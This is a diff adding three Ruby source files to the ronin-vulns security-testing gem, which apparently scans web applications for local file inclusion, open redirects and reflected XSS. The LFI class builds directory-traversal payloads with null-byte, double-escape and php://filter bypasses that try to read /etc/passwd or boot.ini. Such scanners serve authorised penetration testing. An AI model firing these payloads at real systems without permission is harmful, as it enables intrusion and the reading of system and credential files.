ronin-vulns 0.1.0.beta1

data/lib/ronin/vulns/lfi.rb

@@ -0,0 +1,266 @@
+# frozen_string_literal: true
+#
+# ronin-vulns - A Ruby library for blind vulnerability testing.
+#
+# Copyright (c) 2022 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-vulns is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-vulns is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-vulns.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/vulns/web_vuln'
+require 'ronin/vulns/lfi/test_file'
+
+require 'ronin/support/text/patterns'
+require 'ronin/support/crypto'
+require 'ronin/support/compression'
+require 'uri/query_params'
+require 'base64'
+
+module Ronin
+  module Vulns
+    #
+    # Represents a Local File Inclusion (LFI) vulnerability.
+    #
+    # ## Features
+    #
+    # * Supports UNIX and Windows paths.
+    # * Supports `%00` null terminator trick (fixed in PHP 5.3).
+    # * Supports Base64, ROT13, and Zlib `php://filter/`s.
+    #
+    class LFI < WebVuln
+
+      include Ronin::Support
+
+      # The test file for UNIX systems.
+      UNIX_TEST_FILE = TestFile.new('/etc/passwd', %r{(?:[a-z][a-z0-9_-]*:x:\d+:\d+:[^:]*:(?:/[A-Za-z0-9_-]*)+:(?:/[A-Za-z0-9_-]*)+\n)+})
+
+      # The test file for Windows systems.
+      WINDOWS_TEST_FILE = TestFile.new('\\boot.ini', /\[boot loader\](?:\r?\n(?:[^\[\r\n].*)?)*\r?\n(?:\[operating system\](?:\r?\n(?:[^\[\r\n].*)?)*\r?\n)?/m)
+
+      # The default directory traversal depth.
+      DEFAULT_DEPTH = 6
+
+      # Targeted Operating System (OS)
+      #
+      # @return [:unix, :windows, nil]
+      attr_reader :os
+
+      # Optional filter bypass technique to use.
+      # 
+      # @return [:null_byte, :base64, :rot13, :zlib, nil]
+      attr_reader :filter_bypass
+
+      # The number of directories to traverse up
+      #
+      # @return [Integer]
+      attr_reader :depth
+
+      # The directory separator character.
+      #
+      # @return [String]
+      attr_reader :separator
+
+      # The escape path to add to every LFI path
+      #
+      # @return [String]
+      attr_reader :escape_path
+
+      # The common file to test with.
+      #
+      # @return [TestFile]
+      attr_reader :test_file
+
+      #
+      # Creates a new LFI object.
+      #
+      # @param [String, URI::HTTP] url
+      #   The URL to exploit.
+      #
+      # @param [:unix, :windows, nil] os
+      #   Operating System to specifically target.
+      #
+      # @param [Integer] depth
+      #   Number of directories to escape up.
+      #
+      # @param [:null_byte, :double_escape, :base64, :rot13, :zlib, nil] filter_bypass
+      #   Specifies which filter bypass technique to use.
+      #
+      #   * `:null_byte - appends a `%00` null byte to the escaped path.
+      #     **Note:* this technique only works on PHP < 5.3.
+      #   * `:double_escape` - Double escapes the {#escape_path}
+      #     (ex: `....//....//`).
+      #   * `:base64` - Base64 encodes the included local file.
+      #   * `:rot13` - ROT13 encodes the included local file.
+      #   * `:zlib` - Zlib compresses and Base64 encodes the included local
+      #     file.
+      #
+      # @param [Hash{Symbol => Object}] kwargs
+      #   Additional keyword arguments for {WebVuln#initialize}.
+      #
+      def initialize(url, os:            :unix,
+                          depth:         DEFAULT_DEPTH,
+                          filter_bypass: nil,
+                          **kwargs)
+        super(url,**kwargs)
+
+        @os = os
+
+        case @os
+        when :unix
+          @separator = '/'
+          @test_file = UNIX_TEST_FILE
+        when :windows
+          @separator = '\\'
+          @test_file = WINDOWS_TEST_FILE
+        else
+          raise(ArgumentError,"unknown os keyword value (#{@os.inspect}) must be either :unix or :windows")
+        end
+
+        case filter_bypass
+        when :null_byte, :double_escape, :base64, :rot13, :zlib, nil
+          @filter_bypass = filter_bypass
+        else
+          raise(ArgumentError,"unknown filter_bypass keyword value (#{filter_bypass.inspect}) must be :null_byte, :double_escape, :base64, :rot13, :zlib, or nil")
+        end
+
+        @depth       = depth
+        @escape_path = ("..#{@separator}" * @depth)
+
+        apply_filter_bypasses
+      end
+
+      private
+
+      #
+      # Pre-applies additional filter-bypass rules to {#escape_path}.
+      #
+      def apply_filter_bypasses
+        if @filter_bypass == :double_escape
+          # HACK: String#gsub interpretes "\\" as a special character in the
+          # replace string, so we must use String#gsub with a block.
+          @escape_path.gsub!("..#{@separator}") do
+            "....#{@separator}#{@separator}"
+          end
+        end
+      end
+
+      public
+
+      #
+      # Escapes the given path.
+      #
+      # @param [String] path
+      #   The given path to escape.
+      #
+      # @return [String]
+      #   The escaped path.
+      #
+      # @note
+      #   Relative paths and absolute Windows paths to other drives will not
+      #   be escaped.
+      #
+      def escape(path)
+        if @os == :windows && path.start_with?('C:\\')
+          # escape absolute Windows paths to the C: drive
+          "#{@escape_path}#{path[3..]}"
+        elsif @os == :windows && path =~ /\A[A-Z]:/
+          # pass through absolute Windows paths to other drives
+            path
+        elsif path.start_with?(@separator)
+          # escape absolute paths
+          "#{@escape_path}#{path[1..]}"
+        else
+          # pass through relative paths
+          path
+        end
+      end
+
+      #
+      # Builds a `../../..` escaped path for the given file path.
+      #
+      # @param [String] path
+      #   The path to escape.
+      #
+      # @return [String]
+      #   The `../../../` escaped path.
+      #
+      # @note
+      #   * If the given path begins with `php:`, then no `../../../` prefix
+      #     will be added.
+      #   * If initialized with `filter_bypass: :null_byte`, then a `\0`
+      #     character will be appended to the path.
+      #
+      def encode_payload(path)
+        case @filter_bypass
+        when :base64
+          "php://filter/convert.base64-encode/resource=#{path}"
+        when :rot13
+          "php://filter/read=string.rot13/resource=#{path}"
+        when :zlib
+          "php://filter/zlib.deflate/convert.base64-encode/resource=#{path}"
+        when :null_byte
+          "#{escape(path)}\0"
+        else
+          escape(path)
+        end
+      end
+
+      #
+      # Determines whether the URL is vulnerable to Local File Inclusion (LFI).
+      #
+      # @return [Boolean]
+      #
+      def vulnerable?
+        response = exploit(@test_file.path)
+        body     = response.body
+
+        case @filter_bypass
+        when :base64
+          body.scan(Text::Patterns::BASE64).any? do |string|
+            Base64.decode64(string) =~ @test_file
+          end
+        when :rot13
+          Crypto.rot(body,-13) =~ @test_file
+        when :zlib
+          body.scan(Text::Patterns::BASE64).any? do |string|
+            begin
+              Compression.zlib_inflate(Base64.decode64(string)) =~ @test_file
+            rescue Zlib::DataError
+            end
+          end
+        else
+          body =~ @test_file
+        end
+      end
+
+      #
+      # Returns the type or kind of vulnerability.
+      #
+      # @return [Symbol]
+      #
+      # @note
+      #   This is used internally to map an vulnerability class to a printable
+      #   type.
+      #
+      # @api private
+      #
+      # @abstract
+      #
+      def self.vuln_type
+        :lfi
+      end
+
+    end
+  end
+end

data/lib/ronin/vulns/open_redirect.rb

@@ -0,0 +1,118 @@
+# frozen_string_literal: true
+#
+# ronin-vulns - A Ruby library for blind vulnerability testing.
+#
+# Copyright (c) 2022 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-vulns is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-vulns is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-vulns.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/vulns/web_vuln'
+
+require 'chars'
+require 'cgi'
+
+module Ronin
+  module Vulns
+    #
+    # Represents an Open Redirect vulnerability.
+    #
+    # ## Features
+    #
+    # * Checks 301, 302, 303, 307, and 308 HTTP redirects.
+    # * Checks `meta` refresh redirects.
+    # * Includes random alpha-numeric data in the test values.
+    #
+    class OpenRedirect < WebVuln
+
+      # The desired redirect URL to use in the test.
+      #
+      # @return [String]
+      attr_reader :test_url
+
+      #
+      # Initializes the Open Redirect vulnerability.
+      #
+      # @param [String, URI::HTTP] url
+      #   The URL to exploit.
+      #
+      # @param [String] test_url
+      #   The desired redirect URL to test the URL with.
+      #
+      def initialize(url, test_url: self.class.random_test_url, **kwargs)
+        super(url,**kwargs)
+
+        @test_url = test_url
+      end
+
+      #
+      # Generates a random redirect URL to use in tests.
+      #
+      # @return [String]
+      #   A random URL to https://ronin-rb.dev/vulns/open_redirect.html.
+      #
+      # @api private
+      #
+      def self.random_test_url
+        "https://ronin-rb.dev/vulns/open_redirect.html?id=#{Chars::ALPHA_NUMERIC.random_string(5)}"
+      end
+
+      #
+      # Tests whther the URL has a vulnerable Open Redirect.
+      #
+      # @return [Boolean]
+      #
+      def vulnerable?
+        response = exploit(@test_url)
+
+        case response.code
+        when '301', '302', '303', '307', '308'
+          if (locations = response.get_fields('Location'))
+            escaped_test_url = Regexp.escape(@test_url)
+            regexp = %r{\A#{escaped_test_url}(?:[\?&].+)?\z}
+
+            locations.last =~ regexp
+          end
+        else
+          content_type = response.content_type
+
+          if content_type && content_type.include?('text/html')
+            escaped_test_url = Regexp.escape(CGI.escapeHTML(@test_url))
+            regexp = %r{<meta\s+http-equiv\s*=\s*(?:"refresh"|'refresh'|refresh)\s+content\s*=\s*(?:"\s*\d+\s*;\s*url\s*=\s*'\s*#{escaped_test_url}\s*'\s*"|'\s*\d+\s*;\s*url\s*=\s*"\s*#{escaped_test_url}\s*"\s*'|\s*\d+;url=(?:"#{escaped_test_url}"|'#{escaped_test_url}'))\s*(?:/\s*)?>}i
+
+            response.body =~ regexp
+          end
+        end
+      end
+
+      #
+      # Returns the type or kind of vulnerability.
+      #
+      # @return [Symbol]
+      #
+      # @note
+      #   This is used internally to map an vulnerability class to a printable
+      #   type.
+      #
+      # @api private
+      #
+      # @abstract
+      #
+      def self.vuln_type
+        :open_redirect
+      end
+
+    end
+  end
+end

data/lib/ronin/vulns/reflected_xss/context.rb

@@ -0,0 +1,224 @@
+# frozen_string_literal: true
+# frozen_string_literal: true
+#
+# ronin-vulns - A Ruby library for blind vulnerability testing.
+#
+# Copyright (c) 2022 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-vulns is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-vulns is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-vulns.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/vulns/web_vuln'
+
+module Ronin
+  module Vulns
+    class ReflectedXSS < WebVuln
+      #
+      # Represents information about the context which the XSS occurs within.
+      #
+      class Context
+
+        # Where in the HTML the XSS occurs.
+        #
+        # @return [:double_quoted_attr_value, :single_quoted_attr_value, :unquoted_attr_value, :attr_name, :attr_list, :tag_name, :tag_body]
+        #   The context which the XSS occurs in.
+        #   * `:tag_body` occurred within a tag's body (ex: `<tag>XSS...</tag>`)
+        #   * `:double_quoted_attr_value` - occurred in a double quoted
+        #     attribute value (ex: `<tag name="XSS">...</tag>`)
+        #   * `:single_quoted_attr_value` - occurred in a single quoted
+        #     attribute value (ex: `<tag name='XSS'>...</tag>`)
+        #   * `:unquoted_attr_value` - occurred in an unquoted attribute value
+        #     (ex: `<tag name=XSS>...</tag>`)
+        #   * `:attr_name` - occurred in an attribute name
+        #     (ex: `<tag nameXSS ...>`)
+        #   * `:attr_list` - occurred in the attribute list
+        #     (ex: `<tag XSS>...</tag>`)
+        #   * `:tag_name` - occurred in the tag name (ex: `<tagXSS>...</tag>`)
+        #
+        # @api public
+        attr_reader :location
+
+        # The name of the parent tag which the XSS occurs in.
+        #
+        # @return [String]
+        #
+        # @api public
+        attr_reader :tag
+
+        # The attribute name that the XSS occurs in.
+        #
+        # @return [String, nil]
+        #
+        # @api public
+        attr_reader :attr
+
+        #
+        # Initializes the context.
+        #
+        # @param [:double_quoted_attr_value, :single_quoted_attr_value, :unquoted_attr_value, :attr_name, :attr_list, :tag_name, :tag_body] location
+        #
+        # @param [String] tag
+        #
+        # @param [String, nil] attr
+        #
+        # @api private
+        #
+        def initialize(location, tag: nil, attr: nil)
+          @location = location
+
+          @tag  = tag
+          @attr = attr
+        end
+
+        # HTML identifier regexp
+        #
+        # @api private
+        IDENTIFIER = /[A-Za-z0-9_-]+/
+
+        # HTML attribute name regexp.
+        #
+        # @api private
+        ATTR_NAME = IDENTIFIER
+
+        # HTML attribute regexp.
+        #
+        # @api private
+        ATTR = /#{ATTR_NAME}(?:\s*=\s*"[^"]+"|\s*=\s*'[^']+'|=[^"'\s]+)?/
+
+        # HTML attribute list regexp.
+        #
+        # @api private
+        ATTR_LIST = /(?:\s+#{ATTR})*/
+
+        # HTML tag name regexp.
+        #
+        # @api private
+        TAG_NAME = IDENTIFIER
+
+        # Regexp matching when an XSS occurs within a tag's inner HTML.
+        #
+        # @api private
+        IN_TAG_BODY = %r{<(#{TAG_NAME})#{ATTR_LIST}\s*(?:>|/>)[^<>]*\z}
+
+        # Regexp matching when an XSS occurs within a double-quoted attribute
+        # value.
+        #
+        # @api private
+        IN_DOUBLE_QUOTED_ATTR_VALUE = %r{<(#{TAG_NAME})#{ATTR_LIST}\s+(#{ATTR_NAME})\s*=\s*"[^"]+\z}
+
+        # Regexp matching when an XSS occurs within a single-quoted attribute
+        # value.
+        #
+        # @api private
+        IN_SINGLE_QUOTED_ATTR_VALUE = %r{<(#{TAG_NAME})#{ATTR_LIST}\s+(#{ATTR_NAME})\s*=\s*'[^']+\z}
+
+        # Regexp matching when an XSS occurs within an unquoted attribute value.
+        #
+        # @api private
+        IN_UNQUOTED_ATTR_VALUE = %r{<(#{TAG_NAME})#{ATTR_LIST}\s+(#{ATTR_NAME})=[^"'\s]+\z}
+
+        # Regexp matching when an XSS occurs within an attribute's name.
+        #
+        # @api private
+        IN_ATTR_NAME = %r{<(#{TAG_NAME})#{ATTR_LIST}\s+(#{ATTR_NAME})\z}
+
+        # Regexp matching when an XSS occurs within a tag's attribute list.
+        #
+        # @api private
+        IN_ATTR_LIST = %r{<(#{TAG_NAME})#{ATTR_LIST}\s+\z}
+
+        # Regexp matching when an XSS occurs within a tag's name.
+        #
+        # @api private
+        IN_TAG_NAME = %r{<(#{TAG_NAME})\z}
+
+        #
+        # Determine the context of the XSS by checking the characters that come
+        # before the given index.
+        #
+        # @param [String] body
+        #   The HTML response body to inspect.
+        #
+        # @param [Integer] index
+        #   The index which the XSS occurs at.
+        #
+        # @return [Context]
+        #   The context which the XSS occurs in.
+        #
+        # @api private
+        #
+        def self.identify(body,index)
+          prefix = body[0,index]
+
+          if (match = prefix.match(IN_TAG_BODY))
+            new(:tag_body, tag: match[1])
+          elsif (match = prefix.match(IN_DOUBLE_QUOTED_ATTR_VALUE))
+            new(:double_quoted_attr_value, tag: match[1], attr: match[2])
+          elsif (match = prefix.match(IN_SINGLE_QUOTED_ATTR_VALUE))
+            new(:single_quoted_attr_value, tag: match[1], attr: match[2])
+          elsif (match = prefix.match(IN_UNQUOTED_ATTR_VALUE))
+            new(:unquoted_attr_value, tag: match[1], attr: match[2])
+          elsif (match = prefix.match(IN_ATTR_NAME))
+            new(:attr_name, tag: match[1], attr: match[2])
+          elsif (match = prefix.match(IN_ATTR_LIST))
+            new(:attr_list, tag: match[1])
+          elsif (match = prefix.match(IN_TAG_NAME))
+            new(:tag_name, tag: match[1])
+          end
+        end
+
+        # The minimum set of required characters needed for an XSS.
+        #
+        # @api private
+        MINIMAL_REQUIRED_CHARS = Set['>', ' ', '/', '<']
+
+        # The mapping of contexts and their required characters.
+        #
+        # @api private
+        REQUIRED_CHARS = {
+          double_quoted_attr_value: MINIMAL_REQUIRED_CHARS + ['"'],
+          single_quoted_attr_value: MINIMAL_REQUIRED_CHARS + ["'"],
+          unquoted_attr_value:      MINIMAL_REQUIRED_CHARS,
+
+          attr_name: MINIMAL_REQUIRED_CHARS,
+          attr_list: MINIMAL_REQUIRED_CHARS,
+          tag_name:  MINIMAL_REQUIRED_CHARS,
+          tag_body:  MINIMAL_REQUIRED_CHARS
+        }
+
+        #
+        # Determines if the XSS is viable, given the context and the allowed
+        # characters.
+        #
+        # @param [Set<String>] allowed_chars
+        #   The allowed characters.
+        #
+        # @return [Boolean]
+        #   Specifies whether enough characters are allowed to perform an XSS in
+        #   the given context.
+        #
+        # @api private
+        #
+        def viable?(allowed_chars)
+          required_chars = REQUIRED_CHARS.fetch(@location) do
+            raise(NotImplementedError,"cannot determine viability for unknown XSS location type: #{@location.inspect}")
+          end
+
+          allowed_chars.superset?(required_chars)
+        end
+
+      end
+    end
+  end
+end